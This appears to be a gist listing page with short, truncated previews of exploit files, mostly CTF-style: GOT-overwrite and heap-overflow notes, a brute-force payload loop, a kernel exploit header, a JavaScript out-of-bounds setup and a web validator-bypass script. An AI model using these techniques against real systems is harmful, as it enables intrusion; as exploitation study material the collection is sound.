This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
int main() { | |
// char *pass = "THE SECRET HAS BEEN REMOVED LOL"; | |
char *pass = "\x9a\x60\x76\x14\x8b\x36\x5a\x10\x2b\x91\xc4\x6c\xab\x27\x92\x99\xf8\x6a\xec\x5d\x32\x20\x3d\x61\x8f\xc7\xfb\xdd\x02\x72\xbf"; | |
char key[31]; | |
char out[31]; | |
// 2017-07-16 to 2017-07-20 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import string | |
def srand(s): | |
global seed | |
seed = s | |
# microsoft c runtime implementation | |
def rand(): | |
global seed |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
""" | |
Overwrite the GOT entry for __stack_chk_fail with 0x40061a so we jump there instead. | |
The address can be passed in via argv, we cant use nulls but we can use blank strings instead. | |
As the argv location is semi random, it takes around 500 iterations which is pretty reasonable for 64bit | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
ulimit -c 0 | |
export LIBC_FATAL_STDERR_=1 | |
python -c 'print "\xcc\x84\x04\x08"*16 + "\x00\x03\x02\x01" + "DDDD"' > input.bin | |
output="" | |
COUNTER=0 | |
while [[ ! $output =~ "modified" ]]; do | |
MOD=$(( $COUNTER % 1000 )) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
# pylint: skip-file | |
""" | |
When performing a chunked transfer, realloc doesnt take into account the size of the headers allowing an overflow. | |
As the initial heap (0x100) is located inline we can overwrite the current heap location. | |
* overwrite __malloc_heap to point to our fake heap | |
* our fake heap size is huge so that memory os returned near the GOT | |
* overwrite memchr got with shellcode address | |
* win |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM ubuntu | |
RUN apt-get update -y && apt-get install -y gcc | |
RUN ( \ | |
echo '#define _GNU_SOURCE'; \ | |
echo '#include <fcntl.h>'; \ | |
echo '#include <stdio.h>'; \ | |
echo '#include <unistd.h>'; \ | |
\ | |
echo 'char *getenv(const char *__name) {'; \ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
test |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// 4.4.0-116-generic #140-Ubuntu SMP | |
#define _GNU_SOURCE | |
#include <err.h> | |
#include <fcntl.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <sys/mman.h> | |
#include <unistd.h> | |
#include <stdio.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
let oob, oob_rw, base; | |
function setup() { | |
oob = new Uint8Array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]); | |
oob_rw = new BigUint64Array([ | |
0x1111111122222222n, | |
0x1111111122222222n, | |
0x1111111122222222n, | |
]); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
from pwn import * | |
import requests | |
import string | |
""" | |
* can add arbitrary html and pass the validator by adding a tag comment inside the <noscript> and close it | |
* axios uses `input` directly and we can make it an object allowing full param control | |
* cheerio needs a string, but axios tries to return the response as json. If you add `爀` and set the `responseEncoding` to `ascii` the json parsing fails and it returns text |
OlderNewer